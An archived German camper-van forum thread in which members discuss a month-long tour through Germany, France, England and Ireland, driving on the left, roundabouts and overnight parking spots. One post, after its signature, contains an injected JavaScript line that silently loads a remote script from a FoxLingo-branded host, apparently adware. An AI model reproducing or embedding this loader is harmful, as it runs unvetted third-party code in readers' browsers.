PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : wieder zurück



Elisabeth65
03.09.2012, 11:54
Nach einmonatiger Reise durch Deutschland, Frankreich, England und Irland sind wir wieder gut nach Hause gekommen.

Alles hat wunderbar funktioniert, unser "Schnuffi" hat uns gut beherbergt und wir haben die Freiheit wirklich genossen.

Das Tolle am Reisen war, dass wir nirgendwo Probleme hatten, wenn wir für 1 Nacht frei stehen wollten.
So haben wir die herrlichsten Plätze gleich beim Strand, im versteckten Plätzchen neben einer irischen Ruine, am Rhein und in München am Fuße der Alianz-Arena (allerdings war hier zu zahlen) genächtigt.

Leider geht auch dieser Traumurlaub zu Ende, aber das Meer wartet noch um von uns für ein verlängertes Wochenende besucht zu werden.

Schön, dass wir wieder daheim sind, schade, dass wir diese wunderbare Insel verlassen mußten.
Solch eine Herzlichkeit und Gastfreundschaft ist wirklich vorbildhaft!:)

gerilu
03.09.2012, 13:55
Willkommen zurück ....

Frage - das mit dem "seitenverkehrtem Fahren" war kein Problem ??
Einfache Landstraßen meine ich da nicht, sondern diese Mehrfachkreisverkehre z.B. in Ballungsräumen ...

gerilu

Spittelberg
03.09.2012, 14:25
Willkommen zurück ....

Frage - das mit dem "seitenverkehrtem Fahren" war kein Problem ??
Einfache Landstraßen meine ich da nicht, sondern diese Mehrfachkreisverkehre z.B. in Ballungsräumen ...

gerilu


Für mich war das links Fahren kein Problem. Gewöhnungsbedürftig und eigentlich unlogisch war für mich, daß bei Linksverkehr trotzdem Rechtsvorrang herrscht.
Einmal hatte ich ein Problem nach der Ausfahrt von einer Tankstelle auf einer kaum befahrenen Nebenstraße, da bin ich ca. 200 Meter auf der falschen Straßenseite gefahren. :o:eek::o:eek:
Gottseidank konnte ich den Fehler noch korrigieren bevor etwas entgegengekommen ist.

westbahnmichi
03.09.2012, 16:28
Hallo

schön das ihr wieder gesund und knitterfrei zu haus angekommen seid, und bedenkt eines "nach dem urlaub ist vor dem urlaub":D, das gibt hoffnung!!!

derfranze
03.09.2012, 18:35
Für mich war das links Fahren kein Problem. Gewöhnungsbedürftig und eigentlich unlogisch war für mich, daß bei Linksverkehr trotzdem Rechtsvorrang herrscht.

der Rechtskommende ist beim Linksverkehr der Verkehrsteilnehmer am ersten Fahrstreifen, den sie beim überqueren der Straße befahren. Es ist logisch, vor der Kreuzung anzuhalten um nicht getötet oder verletzt zu werden.

Einmal hatte ich ein Problem nach der Ausfahrt von einer Tankstelle auf einer kaum befahrenen Nebenstraße, da bin ich ca. 200 Meter auf der falschen Straßenseite gefahren. :o:eek::o:eek:
Gottseidank konnte ich den Fehler noch korrigieren bevor etwas entgegengekommen ist.

Beim Rechstverkehr ist es unlogisch, dass mich der am ersten Fahrstreifen Linkskommende illegal töten kann! und der Rechstkommende erst der 2. Querverklehr ist und Vorrang hat. Linksverkehr ist geschichtlich gewachsen weil mit dem Beginn des Fahrzeugverkehrs unklar war ob im Gegenverkehr Feind oder Freund ist. Es wurde logischerweise nach links ausgewichen, weil rechts die Waffenhand war.

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

yankee
04.09.2012, 11:10
Linksverkehr ist geschichtlich gewachsen
weil mit dem Beginn des Fahrzeugverkehrs unklar war ob im Gegenverkehr Feind oder Freund ist.
Es wurde logischerweise nach links ausgewichen, weil rechts die Waffenhand war.

super Gschicht´l ! (*freu*)
das erklärt teilweise das "Raubrittertum" auf heutigen Strassen :D
wurscht ob links oder rechts ...
und die Geisterfahrer sind Legasteniker (*brüll*)
lg Heri

Elisabeth65
04.09.2012, 14:08
So, ich hoffe, dass nun mein Beitrag auch wieder aufscheint. Nach so langer Zeit mag auch der PC nicht so gerne arbeiten :D

Der Linksverkehr ist nicht so problematisch. Schwierig sind jene Verkehrsteilnehmer, die keine Rücksicht darauf nehmen, dass man sich halt nicht so gut auskennt.

Im Großen und Ganzen waren wir aber sehr glücklich, dass es bei jeder Kreuzung einen Kreisverkehr gab: nix auskennen, 1x im Kreis fahren, Ausfahrt gefunden, ok, nicht gefunden noch eine Schleife fahren:D

martino35
04.09.2012, 16:02
Hallo Elisabeth,

mal ne Frage zum Stellplatz an der Allianz-Arena: Wie siehts dort mit der Lärmbelästigung durch die nahe Autobahn/S-Bahn etc. aus ? Kann man da nachts überhaupt schlafen ?

Gruss
Martin

Elisabeth65
05.09.2012, 11:49
@martino: die Lärmbelästigung ist für mich kein Problem gewesen und ich habe bei Gott einen sehr seichten Schlaf. Außerdem hat es an diesem Abend und in der Nacht geregnet, also hat sich der eventuell störende Lärm mit den Prasseln der Regentropfen vermischt, aber wie gesagt auch als es tagsüber nicht geregnet hat, hat mich die Autobahn nicht gestört. Die S-Bahn hört man nicht, weil die Arena davor steht!

soul
05.09.2012, 12:24
mal ne Frage zum Stellplatz an der Allianz-Arena: Wie siehts dort mit der Lärmbelästigung durch die nahe Autobahn/S-Bahn etc. aus ? Kann man da nachts überhaupt schlafen ?


hallo!

das geht wunderbar. von der autobahn oder s-bahn nichts störendes und sonst ist da einfach fast keiner. man kann ganz gemütlich den farbwechsel genießen ;-)

https://lh5.googleusercontent.com/-ojghS7SJa2I/Sg6a7HC-rEI/AAAAAAAAFS4/9riO-lbWLKU/s640/2muenchen2009_56.jpg

lg

atrophie
07.09.2012, 14:01
Schön, wenn reisendes Volk wieder gesund heimkehrt.
War ja ne schöne Tour, das Ganze.
Wir sind auch erst vor kurzem heim gekommen.
Wir haben ne Deutschland-Tour durch 11 Bundesländer mit rund 3200 Km unternommen.:D
Genächtigt haben wir auf 15 Womo-Stellplätzen und 1 Campingplatz.
Den Campingplatz hätten wir für 1 Woche reserviert, wobei wir nach 3 Tagen die Flucht ergriffen haben. Viel zu viel RADAU:o
Unsere Reise führte uns über die Lüneburger Heide nach Hamburg, dann weiter zum
Nord-Ostsee-Kanal, mit der Elbfähre von Glückstadt nach Wischhafen und dann nach Cuxhaven.
Dann folgten Butjadingen, Wilhelmshaven, Dornum, Norden, Greetsiel (sehr sehenswert!!), dann der holländischen Grenze entlang, bis an die Mosel. Nun ja, dann schon langsam wieder zurück.
Alles in allem der schönste Urlaub, den wir bislang hatten!:)
Vor allem, da mit meinem Autarkpaket alles so funktioniert hat, wie geplant.

Gruß Peter

Elisabeth65
07.09.2012, 14:53
@Peter: auch von mir ein willkommen zurück. Gesund retour ist das wichtigste.

Unsere Reise war ca. 6000 km lang plus-minus und immer noch kämpfe ich mit einem "Jetlag" nach dieser langen Tour.
Im Grunde war es eine Kulturreise, dessen bin ich mir jetzt noch bewußter wie vorher.
Allerdings konnte ich nicht wissen, dass ich beim Heimkommen totmüde bin und nur sehr schwer wieder in den Alltag finde.

Was du beschreibst vom Campingplatz kommt mir sehr bekannt vor: auch wir wunderten uns, wie laut ein paar Camper und Kinder sein können., Dabei denke ich mir immer, dass das doch klar ist, wenn man auf einem Freiluftgelände ist, wo auch geschlafen wird, dass eine gewisse Ruhe sein sollte.
Nicht dass ich es absolut ruhig brauche, Kinderdrummherum ist ja toll, aber ich brauchs nicht, dass um 22 Uhr Kinder noch nach herzenslust brüllen und schreien, als ob sie sich anders nicht verständigen können. Aber man muß auch dazu sagen, dass deren Eltern so ziemlich gar nix gesagt haben, dass sie leiser sein sollten.

Egal, wir haben es trotzdem genossen.....:)

atrophie
07.09.2012, 15:04
Oh Gott 6000 Km???:eek:
Da wart ihr aber fleißig, alle Achtung.
Wir haben versucht eine kindgerechte Kulturreise zu unternehmen, da unser Spross mit 8 1/2 Jahren noch ein wenig Unterhaltung braucht.
Daher haben wir einige Schifffahrten und dgl. unternommen. Auch bei der Stellplatzwahl wurde auf Plätze an Bauernhöfen geachtet.
Wir hatten lediglich mit verwunderten Blicken einiger Wohnmobilisten zu kämpfen, da wir zeitweise die einzigen waren, die sich mit Gespann zwischen die Mobile verirrt hatten.:rolleyes:
Gruß Peter